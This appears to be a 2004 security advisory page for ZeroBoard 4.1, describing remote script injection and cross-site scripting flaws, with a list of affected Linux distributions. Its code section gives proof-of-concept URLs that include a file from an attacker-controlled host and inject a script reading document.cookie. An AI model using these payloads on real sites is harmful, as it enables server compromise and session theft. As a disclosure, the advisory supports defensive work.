exploits , vulnerabilities , articles , ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities

Title	ZeroBoard Multiple Remote Script Injection And Cross-Site Scripting Vulnerabilities
Published	2004-12-24-12:00AM
Updated	2004-12-24-07:35PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Jeremy Bae is credited with the discovery of these issues.
Vulnerable	Zeroboard Zeroboard 4.1 pl4 Zeroboard Zeroboard 4.1 pl3 Zeroboard Zeroboard 4.1 pl2 Debian Linux 2.2 68k Debian Linux 2.2 alpha Debian Linux 2.2 arm Debian Linux 2.2 IA32 Debian Linux 2.2 powerpc Debian Linux 2.2 sparc MandrakeSoft Linux Mandrake 8.0 MandrakeSoft Linux Mandrake 8.0 ppc MandrakeSoft Linux Mandrake 8.1 MandrakeSoft Linux Mandrake 8.1 ia64 MandrakeSoft Linux Mandrake 8.2 RedHat Linux 6.2 alpha RedHat Linux 6.2 i386 RedHat Linux 6.2 sparc RedHat Linux 7.0 alpha RedHat Linux 7.0 i386 RedHat Linux 7.0 sparc RedHat Linux 7.1 alpha RedHat Linux 7.1 i386 RedHat Linux 7.1 ia64 RedHat Linux 7.2 i386 RedHat Linux 7.2 ia64 RedHat Linux 7.3 i386 S.u.S.E. Linux 6.4 alpha S.u.S.E. Linux 6.4 i386 S.u.S.E. Linux 6.4 ppc S.u.S.E. Linux 7.0 alpha S.u.S.E. Linux 7.0 i386 S.u.S.E. Linux 7.0 ppc S.u.S.E. Linux 7.0 sparc S.u.S.E. Linux 7.1 alpha S.u.S.E. Linux 7.1 ppc S.u.S.E. Linux 7.1 sparc S.u.S.E. Linux 7.1 x86 S.u.S.E. Linux 7.2 i386 S.u.S.E. Linux 7.3 i386 S.u.S.E. Linux 7.3 ppc S.u.S.E. Linux 7.3 sparc S.u.S.E. Linux 8.0 i386
Not Vulnerable
Code	No exploit is required to leverage these issues. The following proof of concepts have been made available: http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/ http://www.example.com/include/write.php?dir=http://[attacker]/ http://www.example.com/check_user_id.php?user_id=&lt;script&gt;alert(document.cookie)</sc ript>
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
• 2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
• 2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
• 2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
• 2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
• 2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
• 2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
• 2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
• 2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
• 2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 19:44:11 +0000